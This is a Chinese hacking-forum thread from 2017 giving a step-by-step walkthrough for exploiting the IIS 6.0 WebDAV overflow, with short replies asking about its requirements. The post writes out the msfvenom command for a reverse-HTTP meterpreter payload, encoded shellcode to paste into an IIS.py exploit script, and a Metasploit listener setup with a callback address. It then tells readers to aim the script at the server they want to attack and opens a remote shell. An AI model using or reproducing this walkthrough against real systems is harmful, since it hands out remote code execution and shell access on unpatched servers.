用户
搜索
  • TA的每日心情
    开心
    2017-1-9 18:05
  • 签到天数: 1 天

    连续签到: 1 天

    [LV.1]初来乍到

    i春秋-脚本小子

    Fplyth0ner

    Rank: 2

    3

    主题

    36

    帖子

    251

    魔法币
    收听
    0
    粉丝
    0
    注册时间
    2016-4-11
    发表于 2017-4-4 14:56:57 2238806
    照着零组的演示,弄了一宿,有点问题,需要大家,交流交流,一起解决!
    废话不多说,直接上正题!

                                                    IIS6.0溢出实战步骤                     BY:Fplyth0ner   Combie攻击小组
    需要外网环境,或可以内网靶机测试
    ===============================================================================================================
    一,编写shellcode
    1,先生成msf payload
    命令:
    [AppleScript] 纯文本查看 复制代码
    msfvenom -p windows/meterpreter/reverse_http LHOST=本机ip LPOERT=4455 -f c

    执行完后请耐心骚等片刻。
    ---------------------------------------------------------------------------------------------------------------
    2,复制下面生成好的payload,然后 存 起来。
    这个就是你的木马!例如 像下面这个样子的字符串
    [AppleScript] 纯文本查看 复制代码
    "\xe6\xbd\xa8\xe7\xa1\xa3\xe7\x9d""\xa1\xe7\x84\xb3\xe6\xe4\xa1\xa8""\xe5\x99\xa3\xe6\xb5\x94\xe6\xa1""\x85\xe3\xa5\x93\xe5\x81\xac\xe5""\x95\xa7\xe6\x9d\xa3\xe3\x8d" 

    省略N多......................
    ---------------------------------------------------------------------------------------------------------------
    3,打开encode.c这个代码,把你刚才保存好的payload,
    替换掉程序里面“ charevil[] = ”后面的 payload
    就是把

    [AppleScript] 纯文本查看 复制代码
    char evil[] =  "/xeb/x16/x5b/x6a/x01/x58/x53/xbb/x0d/x25/x86/x7c/xff/xd3/x31/xc0" "/x50/xbb/x12/xcb/x81/x7c/xff/xd3/xe8/xe5/xff/xff/xff/x63/x61/x6c" "/x63/x2e/x65/x78/x65/x00";
    这里面的payload改成你自己的,很简单,复制,粘贴。
    ---------------------------------------------------------------------------------------------------------------
    4,在linux环境,用gcc命令编译修改好的encode.c,会在同一文件夹生成 encode 这个可执行程序
    命令:
    [AppleScript] 纯文本查看 复制代码
    gcc -o encode encode.c

           !!注意:这个encode.c会报错,里面貌似有语法错误,我会找c++群里的人问问,你们要是有办法能让他正常编译出来,马上分享,我超爱你们的!!
    ---------------------------------------------------------------------------------------------------------------
    5,编译好了以后,执行下面的命令
    命令:  
    [AppleScript] 纯文本查看 复制代码
    ./encode --upercase --unicode ESI

    执行完这条命令以后,它会把你之前msf生成的payload重新编码加密,在下面会显示出编好的shellcode,长的像这个样子
    [AppleScript] 纯文本查看 复制代码
    VVYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JB6X6WMV7O7Z8Z8Y8Y2TMTJT1M017Y6Q01010ELSKS0ELS3SJM0K7T0J061K4K6U7W5KJLOLMR5ZNL0ZMV5L5LMX1ZLP0V3L5O5SLZ5Y4PKT4P4O5O4U3YJL7NLU8PMP1QMTMK051P1Q0F6T00NZLL2K5U0O0X6P0NKS0L6P6S8S2O4Q1U1X06013W7M0B2X5O5R2O02LTLPMK7UKL1Y9T1Z7Q0FLW2RKU1P7XKQ3O4S2ULR0DJN5Q4W1O0HMQLO3T1Y9V8V0O1U0C5LKX1Y0R2QMS4U9O2T9TML5K0RMP0E3OJZ2QMSNNKS1Q4L4O5Q9YMP9K9K6SNNLZ1Y8NMLML2Q8Q002U100Z9OKR1M3Y5TJM7OLX8P3ULY7Y0Y7X4YMW5MJULY7R1MKRKQ5W0X0N3U1KLP9O1P1L3W9P5POO0F2SMXJNJMJS8KJNKPA

    然后你把生成的这些玩意,复制下来,也是保存好。
    ---------------------------------------------------------------------------------------------------------------
    6.把上面你保存好的shellcode替换到 IIS.py 的 shellcode= 后面
    原来IIS.py里面的是:
    [AppleScript] 纯文本查看 复制代码
    shellcode='VVYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JB6X6WMV7O7Z8Z8Y8Y2TMTJT1M017Y6Q01010ELSKS0ELS3SJM0K7T0J061K4K6U7W5KJLOLMR5ZNL0ZMV5L5LMX1ZLP0V3L5O5SLZ5Y4PKT4P4O5O4U3YJL7NLU8PMP1QMTMK051P1Q0F6T00NZLL2K5U0O0X6P0NKS0L6P6S8S2O4Q1U1X06013W7M0B2X5O5R2O02LTLPMK7UKL1Y9T1Z7Q0FLW2RKU1P7XKQ3O4S2ULR0DJN5Q4W1O0HMQLO3T1Y9V8V0O1U0C5LKX1Y0R2QMS4U9O2T9TML5K0RMP0E3OJZ2QMSNNKS1Q4L4O5Q9YMP9K9K6SNNLZ1Y8NMLML2Q8Q002U100Z9OKR1M3Y5TJM7OLX8P3ULY7Y0Y7X4YMW5MJULY7R1MKRKQ5W0X0N3U1KLP9O1P1L3W9P5POO0F2SMXJNJMJS8KJNKPA'

    把里面的换成你生成的就行了。
    ===============================================================================================================
    二,配置metasploit
    7,下面这些玩意都能看懂吧!我就不讲解了!
    监听
    [AppleScript] 纯文本查看 复制代码
    msf exploit(handler) > set LHOST 192.168.2.131LHOST => 192.168.2.131msf exploit(handler) > set LPORT 4455LPORT => 4455msf exploit(handler) > exploit -j

    ===============================================================================================================
    三,必杀技
    8,打开IIS.py,找到这条 sock.connect(('127.0.0.1',80))  把里面的ip和端口都改成你要攻击的服务器,然后保存退出。
    直接开始攻击!!!

    命令:
    [AppleScript] 纯文本查看 复制代码
    python IIS.py


    好的,执行完以后就回到msf看看到底有没有shell反弹回来吧!
    ---------------------------------------------------------------------------------------------------------------
    9,反弹回shell以后,在msf里执行jobs
    然后

    [AppleScript] 纯文本查看 复制代码
    msf exploit(handler) > sessions -lsessions -i 会话的序号meterpreter >shell

    OK,攻击完成!熟悉的cmd命令行!!

    BY:Fplyth0ner   Combie攻击小组

    我需要更多的帮助!!QQ:980348599

    有分享才会有进步!IIS6.0溢出攻击教程(密码:combie).rar

    9.65 KB, 下载次数: 69, 下载积分: 魔法币 -3

    售价: 2 魔法币  [记录]

    全在里面了

    攻防无绝对,技术无黑白
    发表于 2017-4-9 12:10:38
    fant0me 发表于 2017-4-5 07:04
    这个是通用吗?  还是要条件的?

    windows server 2003 R2,iis服务开启了webDAV应用
    使用道具 举报 回复
    发表于 2017-6-9 13:53:50
    夕立 发表于 2017-6-6 09:54
    这个版本实在是有点老了

    恩是的,模块已经出来了,帖子就是改造poc
    攻防无绝对,技术无黑白
    使用道具 举报 回复
    发表于 2017-4-4 15:02:30
    一楼我占了,这里面的问题我也说了,需要大家积极的交流解决和分享,感谢i春秋!
    攻防无绝对,技术无黑白
    使用道具 举报 回复
    发表于 2017-4-9 12:09:35
    迷离轩 发表于 2017-4-5 10:16
    encode.c哪来的?

    在附件里面
    使用道具 举报 回复
    发表于 2017-4-5 15:04:12
    这个是通用吗?  还是要条件的?
    提莫队长正在待命
    使用道具 举报 回复
    这个我怎么执行的时候都会出错
    使用道具 举报 回复
    小爱_Joker 版主 成大事者 不拘小节 楚 积极活跃奖 i春秋签约作者 爱心勋章
    板凳
    发表于 2017-4-4 16:41:01
    二楼 .
    使用道具 举报 回复
    使用道具 举报 回复
    发表于 2017-4-5 10:36:15
    厉害啊
    使用道具 举报 回复
    发表于 2017-4-5 10:38:34
    抛弃6.0才是正道,或者抛弃iis
    使用道具 举报 回复
    发表于 2017-4-5 11:12:39
    来学习一下
    使用道具 举报 回复
    发表于 2017-4-5 13:33:03
    这个地方应该准备很多话,文艺的,个性的,装b的,但是词穷。
    使用道具 举报 回复
    发表于 2017-4-5 18:16:40
    encode.c哪来的?
    使用道具 举报 回复
    看看吧!!
    使用道具 举报 回复
    学习学习
    使用道具 举报 回复
    使用道具 举报 回复
    发表于 2017-4-6 20:04:21
    社会我龙哥
    使用道具 举报 回复
    12下一页
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册